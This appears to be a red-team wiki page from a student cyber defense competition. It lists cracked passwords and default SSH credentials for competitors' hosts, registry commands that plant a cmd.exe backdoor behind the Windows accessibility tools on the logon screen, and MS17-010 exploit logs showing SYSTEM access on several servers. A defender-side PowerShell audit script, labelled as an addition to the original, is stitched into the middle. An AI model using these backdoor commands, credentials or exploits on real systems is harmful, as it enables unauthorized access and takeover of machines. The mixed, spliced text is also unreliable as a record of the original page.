Red Wiki

Competition Information
Flag Locations
Team Wiki Pages

Team 2:    None

Team 3:    None

Team 4:    None

Team 6:    mejaredbrees

Team 7:    None

Team 8:    None

Team 9:    None

Team 10:    None

Team 14:    None

Team 40:    None

General Help and Information
Due to download issues, put uploads here. Sorry about that - IScorE Dev Team
https://drive.google.com/drive/folders/17mzqbEGVvDC-zscF1qKheBBFLSlZ2cPD?usp=sharing



brakeman-results.out has code scan errors for the Canvas codebase.

A few cracked user accounts / passwords:

lup39sex         (rreid)
mib23dez         (gbenjamin)
suz48dan         (sdavid)
boc41kim         (mgonzalez)
mam13kan         (jmitchell)
kiw33reg         (jvaldez)
koc15lix         (fsoto)
mah17jok         (cchavez)
moh16liz         (dcampbell)
peq14nuy         (rlloyd)
bod40jen         (bstevens)
lan17nox         (ajohnston)




Scenario: https://drive.google.com/open?id=16D9ujgxQUgh2CD3ynZ8PI5faefPi5S0f



[-] Found the following credentials
[-] Key: ! Sudo
[+] 3/www.team3.isucdc.com:22/Canvas SSH Succeeded!  Found credentials: cdc:cdc!
[+] 4/www.team4.isucdc.com:22/Canvas SSH Succeeded!  Found credentials: cdc:cdc!
[+] 6/www.team6.isucdc.com:22/Canvas SSH Succeeded!  Found credentials: cdc:cdc!
[+] 8/www.team8.isucdc.com:22/Canvas SSH Succeeded!  Found credentials: cdc:cdc!



Remote Desktop backdoor method: edit the registry

Hotkeys - hit Shift 5 times
reg ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "c:\Windows\system32\cmd.exe" /f
Click the accessibility button, then select Narrator
reg ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe" /v Debugger /t REG_SZ /d "c:\Windows\system32\cmd.exe" /f
Click the accessibility button, then select Magnify
reg ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /v Debugger /t REG_SZ /d "c:\Windows\system32\cmd.exe" /f
Click the accessibility button, then select On-Screen Keyboard
reg ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /t REG_SZ /d "c:\Windows\system32\cmd.exe" /f
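
A defender-side check for the registry change above, as an added example that is not part of the original wiki: it lists every Image File Execution Options subkey that carries a Debugger value and flags the four binaries named here. It goes beyond those four by scanning all subkeys and the 32-bit registry view; the variable names are this example's own.

```powershell
# Added example: read-only audit of Image File Execution Options (IFEO)
# Debugger values. Run from an elevated PowerShell prompt on the host.
$views = @(
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
)

# The four binaries named on this page; all can be launched from the logon screen.
$logonScreenTools = 'sethc.exe', 'Narrator.exe', 'Magnify.exe', 'osk.exe'

$findings = foreach ($view in $views) {
    if (-not (Test-Path -Path $view)) { continue }
    foreach ($key in Get-ChildItem -Path $view -ErrorAction SilentlyContinue) {
        $debugger = $key.GetValue('Debugger')
        if ($null -eq $debugger) { continue }   # subkey has no Debugger value
        [pscustomobject]@{
            Image       = $key.PSChildName
            Debugger    = $debugger
            LogonScreen = $logonScreenTools -contains $key.PSChildName
            KeyPath     = $key.PSPath
        }
    }
}

if ($findings) {
    # Logon-screen binaries first. Other hits need review rather than automatic
    # removal: some tools set a Debugger value on purpose (for example, a
    # Task Manager replacement registered under taskmgr.exe).
    $findings | Sort-Object -Property LogonScreen -Descending |
        Format-Table -AutoSize -Wrap
} else {
    Write-Output 'No IFEO Debugger values found.'
}

# Remediation, left commented out so the audit stays read-only by default:
# $findings | Where-Object LogonScreen | ForEach-Object {
#     Remove-ItemProperty -Path $_.KeyPath -Name Debugger
# }
```

Requiring Network Level Authentication for RDP also matters here, because the client then has to authenticate before the logon screen and its accessibility buttons are shown.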


Top teams' MS17-010 vulnerabilities (successful ipconfig execution = vulnerable)

[*] 33.96.5.42:445        - Target OS: Windows Server 2016 Datacenter Evaluation 14393
[-] 33.96.5.42:445        - Unable to find accessible named pipe!
[*] 33.96.5.41:445        - Target OS: Windows Server 2016 Datacenter Evaluation 14393
[-] 33.96.5.41:445        - Unable to find accessible named pipe!
[*] Scanned  4 of 31 hosts (12% complete)
[*] 33.96.5.30:445        - Target OS: Windows Server 2016 Datacenter 14393
[*] 33.96.5.30:445        - Built a write-what-where primitive...
[+] 33.96.5.30:445        - Overwrite complete... SYSTEM session obtained!
[+] 33.96.5.30:445        - Service start timed out, OK if running a command or non-service executable...
[*] 33.96.5.30:445        - checking if the file is unlocked
[*] 33.96.5.30:445        - Getting the command output...
[*] 33.96.5.30:445        - Executing cleanup...
[+] 33.96.5.30:445        - Cleanup was successful
[+] 33.96.5.30:445        - Command completed successfuly!
[*] 33.96.5.30:445        - Output for "ipconfig":


Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 33.96.5.30
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 33.96.5.254

Tunnel adapter isatap.{AF1106AF-723F-4759-B24C-8A4E9AFEE5A7}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :


[*] 33.96.5.31:445        - Target OS: Windows Server 2016 Datacenter Evaluation 14393
[*] 33.96.5.31:445        - Built a write-what-where primitive...
[+] 33.96.5.31:445        - Overwrite complete... SYSTEM session obtained!
[+] 33.96.5.31:445        - Service start timed out, OK if running a command or non-service executable...
[*] 33.96.5.31:445        - checking if the file is unlocked
[*] 33.96.5.31:445        - Getting the command output...
[*] 33.96.5.31:445        - Executing cleanup...
[+] 33.96.5.31:445        - Cleanup was successful
[+] 33.96.5.31:445        - Command completed successfuly!
[*] 33.96.5.31:445        - Output for "ipconfig":


Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::7466:7c32:f017:24c5%6
   IPv4 Address. . . . . . . . . . . : 33.96.5.31
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 33.96.5.254

Tunnel adapter isatap.{6781869F-8713-45A1-A24C-5331AF95B932}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :


[-] 33.96.5.69:445        - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCESS_DENIED (Command=115 WordCount=0)
[*] Scanned  7 of 31 hosts (22% complete)
[*] 33.96.5.70:445        - Target OS: Windows Server 2016 Datacenter 14393
[-] 33.96.5.70:445        - Timeout::Error
[-] 33.96.5.70:445        - execution expired
[-] 201.203.200.41:445    - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCESS_DENIED (Command=115 WordCount=0)
[-] 201.203.200.42:445    - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCESS_DENIED (Command=115 WordCount=0)
[*] Scanned 10 of 31 hosts (32% complete)
[*] 201.203.200.40:445    - Target OS: Windows Server 2016 Standard 14393
[-] 201.203.200.40:445    - Unable to find accessible named pipe!
[-] 201.203.200.70:445    - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCESS_DENIED (Command=115 WordCount=0)
[*] 201.203.200.30:445    - Target OS: Windows Server 2016 Standard 14393
[-] 201.203.200.30:445    - Unable to find accessible named pipe!
[*] Scanned 13 of 31 hosts (41% complete)
[*] 201.203.200.10:445    - Target OS: Windows 6.1
[-] 201.203.200.10:445    - Exploit unavailable for target OS.
[*] 201.203.200.20:445    - Target OS: Windows Server 2016 Standard 14393
[-] 201.203.200.20:445    - TypeError leaking initial Frag size, is the target patched?
[*] 200.2.96.42:445       - Target OS: Windows Server 2016 Datacenter 14393
[-] 200.2.96.42:445       - Unable to find accessible named pipe!
[*] Scanned 16 of 31 hosts (51% complete)
[-] 200.2.96.43:445       - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCESS_DENIED (Command=115 WordCount=0)
[-] 200.2.96.40:445       - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCESS_DENIED (Command=115 WordCount=0)
[*] 200.2.96.30:445       - Target OS: Windows Server 2016 Standard 14393
[-] 200.2.96.30:445       - Unable to find accessible named pipe!
[*] Scanned 19 of 31 hosts (61% complete)
[-] 200.2.96.70:445       - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCESS_DENIED (Command=115 WordCount=0)
[-] 200.2.96.32:445       - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCESS_DENIED (Command=115 WordCount=0)
[*] 200.2.96.41:445       - Target OS: Windows Server 2016 Datacenter 14393
[-] 200.2.96.41:445       - Unable to find accessible named pipe!
[*] Scanned 22 of 31 hosts (70% complete)
[*] 200.2.96.31:445       - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 200.2.96.31:445       - Built a write-what-where primitive...
[+] 200.2.96.31:445       - Overwrite complete... SYSTEM session obtained!
[+] 200.2.96.31:445       - Service start timed out, OK if running a command or non-service executable...
[*] 200.2.96.31:445       - checking if the file is unlocked
[*] 200.2.96.31:445       - Getting the command output...
[*] 200.2.96.31:445       - Executing cleanup...
[+] 200.2.96.31:445       - Cleanup was successful
[+] 200.2.96.31:445       - Command completed successfuly!
[*] 200.2.96.31:445       - Output for "ipconfig":


Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::809:2be6:b646:3142%4
   IPv4 Address. . . . . . . . . . . : 200.2.96.31
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 200.2.96.254

Tunnel adapter isatap.{2028FE47-A499-4D2E-97D7-3B13B7B9CEB1}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :


[*] 200.2.96.33:445       - Target OS: Windows 6.1
[-] 200.2.96.33:445       - Exploit unavailable for target OS.
[*] 49.49.33.41:445       - Target OS: Windows Server 2016 Standard 14393
[-] 49.49.33.41:445       - TypeError leaking initial Frag size, is the target patched?
[*] Scanned 25 of 31 hosts (80% complete)
[-] 49.49.33.43:445       - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCESS_DENIED (Command=115 WordCount=0)
[*] 49.49.33.20:445       - Target OS: Windows Server 2016 Datacenter 14393
[-] 49.49.33.20:445       - Unable to find accessible named pipe!
[-] 49.49.33.42:445       - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCESS_DENIED (Command=115 WordCount=0)
[*] Scanned 28 of 31 hosts (90% complete)
[*] 49.49.33.70:445       - Target OS: Windows Server 2012 R2 Datacenter 9600
[*] 49.49.33.70:445       - Built a write-what-where primitive...
[+] 49.49.33.70:445       - Overwrite complete... SYSTEM session obtained!
[+] 49.49.33.70:445       - Service start timed out, OK if running a command or non-service executable...
[*] 49.49.33.70:445       - checking if the file is unlocked
[*] 49.49.33.70:445       - Getting the command output...
[*] 49.49.33.70:445       - Executing cleanup...
[+] 49.49.33.70:445       - Cleanup was successful
[+] 49.49.33.70:445       - Command completed successfuly!
[*] 49.49.33.70:445       - Output for "ipconfig":


Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 49.49.33.70
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 49.49.33.254

Tunnel adapter isatap.{1F1C4CEF-4588-4FFA-8B89-9A7E08B3793F}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter 6TO4 Adapter:

   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : 2002:3131:2146::3131:2146
   Default Gateway . . . . . . . . . :


[*] 49.49.33.30:445       - Target OS: Windows Server 2016 Datacenter 14393
[-] 49.49.33.30:445       - Unable to find accessible named pipe!
[*] 49.49.33.100:445      - Target OS: Windows Server 2016 Datacenter 14393
[*] 49.49.33.100:445      - Built a write-what-where primitive...
[+] 49.49.33.100:445      - Overwrite complete... SYSTEM session obtained!
[+] 49.49.33.100:445      - Service start timed out, OK if running a command or non-service executable...
[*] 49.49.33.100:445      - checking if the file is unlocked
[*] 49.49.33.100:445      - Getting the command output...
[*] 49.49.33.100:445      - Executing cleanup...
[+] 49.49.33.100:445      - Cleanup was successful
[+] 49.49.33.100:445      - Command completed successfuly!
[*] 49.49.33.100:445      - Output for "ipconfig":


Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 49.49.33.100
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 49.49.33.254

Tunnel adapter Reusable ISATAP Interface {A118EA7A-D922-4489-9C9D-D16A375AD4C3}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :